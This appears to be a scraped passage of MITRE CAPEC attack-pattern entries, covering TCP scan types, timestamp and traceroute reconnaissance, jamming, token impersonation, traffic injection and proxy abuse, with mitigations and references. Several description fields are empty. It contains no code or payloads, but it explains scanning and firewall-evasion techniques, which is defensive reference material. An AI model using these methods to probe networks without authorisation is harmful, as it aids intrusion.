Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 48. 6th Edition. McGraw Hill. 2009.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 3.6.2 TCP SYN Ping, pg. 61. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

[REF-125] Mark Wolfgang. "Host Discovery with Nmap". 2002-11. <http://nmap.org/docs/discovery.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Related_Weaknesses, Resources_Required
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-287: TCP SYN Scan

Attack Pattern ID: 287

Abstraction: Detailed

View customized information:

Description

Extended Description

RFC 793 defines the required behavior of any TCP/IP device in that an incoming connection request begins with a SYN packet, which in turn must be followed by a SYN/ACK packet from the receiving service. For this reason, like TCP Connect scanning, SYN scanning works against any TCP stack. Unlike TCP Connect scanning, it is possible to scan thousands of ports per second using this method. This type of scanning is usually referred to as 'half-open' scanning because it does not complete the three-way handshake. The scanning rate is extremely fast because no time is wasted completing the handshake or tearing down the connection. This technique allows an attacker to scan through stateful firewalls due to the common configuration that TCP SYN segments for a new connection will be allowed for almost any port. TCP SYN scanning can also immediately detect 3 of the 4 important types of port status: open, closed, and filtered.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	300	Port Scanning

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Experiment

An adversary sends SYN packets to ports they want to scan and checks the response without completing the TCP handshake.
An adversary uses the response from the target to determine the port's state. The adversary can determine the state of a port based on the following responses. When a SYN is sent to an open port and unfiltered port, a SYN/ACK will be generated. When a SYN packet is sent to a closed port a RST is generated, indicating the port is closed. When SYN scanning to a particular port generates no response, or when the request triggers ICMP Type 3 unreachable errors, the port is filtered.

Prerequisites

This scan type is not possible with some operating systems (Windows XP SP 2). On Linux and Unix systems it requires root privileges to use raw sockets.

Resources Required

The ability to send TCP SYN segments to a host during network reconnaissance via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 5.32 TCP SYN (Stealth) Scan, pg. 100. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Description, Description Summary, References, Related_Weaknesses, Resources_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-320: TCP Timestamp Probe

Attack Pattern ID: 320

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	312	Active OS Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Determine if timestamps are present.: The adversary sends a probe packet to the remote host to identify if timestamps are present.

Experiment

Record and analyze timestamp values.: If the remote host is using timestamp, obtain several timestamps, analyze them and compare them to known values.

Techniques
The adversary sends several requests and records the timestamp values.
The adversary analyzes the timestamp values and determines an average increments per second in the timestamps for the target.
The adversary compares this result to a database of known TCP timestamp increments for a possible match.

Prerequisites

The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card.The target OS must support the TCP timestamp option in order to obtain a fingerprint.

Resources Required

A tool capable of sending and receiving packets from a remote system.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Bypass Protection Mechanism

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases, Description, Description Summary, Related_Weaknesses

CAPEC-306: TCP Window Scan

Attack Pattern ID: 306

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	300	Port Scanning

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Experiment

An adversary sends TCP packets with the ACK flag set and that are not associated with an existing connection to target ports.
An adversary uses the response from the target to determine the port's state. Specifically, the adversary views the TCP window size from the returned RST packet if one was received. Depending on the target operating system, a positive window size may indicate an open port while a negative window size may indicate a closed port.

Prerequisites

TCP Window scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.

Resources Required

The ability to send TCP segments with a custom window size to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 55-56. 6th Edition. McGraw Hill. 2009.

[REF-34] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 5.8 TCP Window Scan, pg. 115. 3rd "Zero Day" Edition,. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description, Description Summary, References, Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Execution_Flow

CAPEC-303: TCP Xmas Scan

Attack Pattern ID: 303

Abstraction: Detailed

View customized information:

Description

Extended Description

In addition to its relative speed when compared with other types of scans, its major advantage is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. XMAS packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, XMAS scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, XMAS scans are flagged by almost all intrusion prevention or intrusion detection systems.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	300	Port Scanning

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Experiment

An adversary sends TCP packets with all flags set but not associated with an existing connection to target ports.
An adversary uses the response from the target to determine the port's state. If no response is received the port is open. If a RST packet is received then the port is closed.

Prerequisites

The adversary needs logical access to the target network. XMAS scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.

Resources Required

This attack can be carried out with a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities
Availability	Unreliable Execution

Mitigations

Employ a robust network defensive posture that includes a managed IDS/IPS.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Notes

Other

Many operating systems do not implement RFC 793 exactly and for this reason XMAS scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing the adversary from distinguishing between open and closed ports. XMAS scans are limited by the range of platforms against which they work.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description, Description Summary, References, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Execution_Flow, Notes
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-599: Terrestrial Jamming

Attack Pattern ID: 599

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	195	Principal Spoof

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Engage in Deceptive Interactions

Resources Required

A terrestrial satellite jammer with a signal more powerful than that of the satellite attempting to communicate with the target.

The adversary must know the location of the target satellite dish.

Consequences

Scope	Impact	Likelihood
Availability	Other

Example Instances

An attempt to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These jamming signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-462] Small Media. "Satellite Jamming in Iran: A War over Airwaves". 2012-11.

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-12 (Version 2.9)	Seamus Tuohy
2017-01-12 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Description, Related_Attack_Patterns

CAPEC-295: Timestamp Request

Attack Pattern ID: 295

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	292	Host Discovery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The ability to send a timestamp request to a remote target and receive a response.

Resources Required

Scanners or utilities that provide the ability to send custom ICMP queries.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other

Example Instances

An adversary sends an ICMP type 13 Timestamp Request to determine the time as recorded by a remote target. Timestamp Replies, ICMP Type 14, usually return a value in Greenwich Mean Time. An adversary can attempt to use an ICMP Timestamp requests to 'ping' a remote system to see if is alive. Additionally, because these types of messages are rare they are easily spotted by intrusion detection systems, many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 13 and egress ICMP type 14 messages.

An adversary may gather the system time or time zone from a local or remote system. This information may be gathered in a number of ways, such as with Net on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. The information could be useful for performing other techniques, such as executing a file with a Scheduled Task, or to discover locality information based on time zone to assist in victim targeting

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1124	System Time Discovery

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pp. 44-51. 6th Edition. McGraw Hill. 2009.

[REF-123] J. Postel. "RFC792 - Internet Control Messaging Protocol". Defense Advanced Research Projects Agency (DARPA). 1981-09. <http://www.faqs.org/rfcs/rfc792.html>.

[REF-124] R. Braden, Ed.. "RFC1122 - Requirements for Internet Hosts - Communication Layers". 1989-10. <http://www.faqs.org/rfcs/rfc1122.html>.

[REF-125] Mark Wolfgang. "Host Discovery with Nmap". 2002-11. <http://nmap.org/docs/discovery.pdf>.

[REF-147] Gordon "Fyodor" Lyon. "Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning". Section 3.7.2 ICMP Probe Selection, pg. 70. 3rd "Zero Day" Edition. Insecure.com LLC, ISBN: 978-0-9799587-1-7. 2008.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Prerequisites, Description Summary, Examples-Instances, References, Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
Previous Entry Names
Change Date	Previous Entry Name
2018-07-31 (Version 2.12)	ICMP Timestamp Request

CAPEC-633: Token Impersonation

Attack Pattern ID: 633

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	194	Fake the Source of Data

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

This pattern of attack is only applicable when a downstream user leverages tokens to verify identity, and then takes action based on that identity.

Consequences

Scope	Impact	Likelihood
Integrity	Alter Execution Logic
Integrity	Gain Privileges
Integrity	Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
287	Improper Authentication
1270	Generation of Incorrect Security Tokens

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1134	Access Token Manipulation

Content History

Submissions
Submission Date	Submitter	Organization
2018-04-12 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2018-04-12 (Version 2.11)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses, Taxonomy_Mappings

CAPEC-293: Traceroute Route Enumeration

Attack Pattern ID: 293

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	309	Network Topology Mapping

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

A network capable of routing the attackers' packets to the destination network.

Resources Required

A command line version of traceroute or similar tool that performs route enumeration.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pp. 38-41. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary, Related_Weaknesses

CAPEC-594: Traffic Injection

Attack Pattern ID: 594

Abstraction: Meta

View customized information:

Description

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	595	Connection Reset

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

The target application must leverage an open communications channel.

The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94).

Resources Required

A tool, such as a MITM Proxy, that is capable of generating and injecting custom inputs to be used in the attack.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution
Integrity	Other

Related Weaknesses

CWE-ID	Weakness Name
940	Improper Verification of Source of a Communication Channel

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-03 (Version 2.8)	Seamus Tuohy
2017-01-03 (Version 2.8)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Prerequisites

CAPEC-385: Transaction or Event Tampering via Application API Manipulation

Attack Pattern ID: 385

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	384	Application API Message Manipulation via Man-in-the-Middle

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Subvert Access Control

Prerequisites

Targeted software is utilizing application framework APIs

Resources Required

A software program that allows the use of adversary-in-the-middle communications (CAPEC-94) between the client and server, such as a man-in-the-middle proxy.

Related Weaknesses

CWE-ID	Weakness Name
471	Modification of Assumed-Immutable Data (MAID)
345	Insufficient Verification of Data Authenticity
346	Origin Validation Error
602	Client-Side Enforcement of Server-Side Security
311	Missing Encryption of Sensitive Data

References

[REF-327] Tom Stracener and Sean Barnum. "So Many Ways [...]: Exploiting Facebook and YoVille". Defcon 18. 2010.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Resources_Required

CAPEC-465: Transparent Proxy Abuse

Attack Pattern ID: 465

Abstraction: Standard

View customized information:

Description

Extended Description

Transparent proxies are often used by enterprises and ISPs. For requests originating at the client transparent proxies need to figure out the final destination of the client's data packet. Two ways are available to do that: either by looking at the layer three (network) IP address or by examining layer seven (application) HTTP header destination. A browser has same origin policy that typically prevents scripts coming from one domain initiating requests to other websites from which they did not come. To circumvent that, however, malicious Flash or an Applet that is executing in the user's browser can attempt to create a cross-domain socket connection from the client to the remote domain. The transparent proxy will examine the HTTP header of the request and direct it to the remote site thereby partially bypassing the browser's same origin policy. This can happen if the transparent proxy uses the HTTP host header information for addressing rather than the IP address information at the network layer. This attack allows malicious scripts inside the victim's browser to issue cross-domain requests to any hosts accessible to the transparent proxy.

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	554	Functionality Bypass

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

Transparent proxy is usedVulnerable configuration of network topology involving the transparent proxy (e.g., no NAT happening between the client and the proxy)Execution of malicious Flash or Applet in the victim's browser

Skills Required

[Level: Medium]

Creating malicious Flash or Applet to open a cross-domain socket connection to a remote system

Mitigations

Design: Ensure that the transparent proxy uses an actual network layer IP address for routing requests. On the transparent proxy, disable the use of routing based on address information in the HTTP host header.

Configuration: Disable in the browser the execution of Java Script, Flash, SilverLight, etc.

Related Weaknesses

CWE-ID	Weakness Name
441	Unintended Proxy or Intermediary ('Confused Deputy')

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1090.001	Proxy: Internal Proxy

References

[REF-402] Robert Auger. "Socket Capable Browser Plugins Result In Transparent Proxy Abuse". 2009. <http://www.thesecuritypractice.com/the_security_practice/TransparentProxyAbuse.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Socket Capable Browser Plugins Result In Transparent Proxy Abuse

CAPEC-133: Try All Common Switches

Attack Pattern ID: 133

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	113	Interface Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Identify application: Discover an application of interest by exploring service registry listings or by connecting on a known port or some similar means.
Techniques
Search via internet for known, published applications that allow option switches.
Use automated tools to scan known ports to identify applications that might be accessible
Authenticate to application: Authenticate to the application, if required, in order to explore it.
Techniques
Use published credentials to access system.
Find unpublished credentails to access service.
Use other attack pattern or weakness to bypass authentication.

Experiment

Try all common switches: Using manual or automated means, attempt to run the application with many different known common switches. Observe the output to see if any switches seemed to put the application in a non production mode that might give more information.
Techniques
Manually execute the application with switches such as --debug, --test, --development, --verbose, etc.
Use automated tools to run the application with common switches and observe the output

Exploit

Use sensitive processing or configuration information: Once extra information is observed from an application through the use of a common switch, this information is used to aid other attacks on the application
Techniques
Using application information, formulate an attack on the application

Prerequisites

The attacker must be able to control the options or switches sent to the target.

Resources Required

None: No specialized resources are required to execute this type of attack. The only requirement is the ability to send requests to the target.

Mitigations

Design: Minimize switch and option functionality to only that necessary for correct function of the command.

Implementation: Remove all debug and testing options from production code.

Related Weaknesses

CWE-ID	Weakness Name
912	Hidden Functionality

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
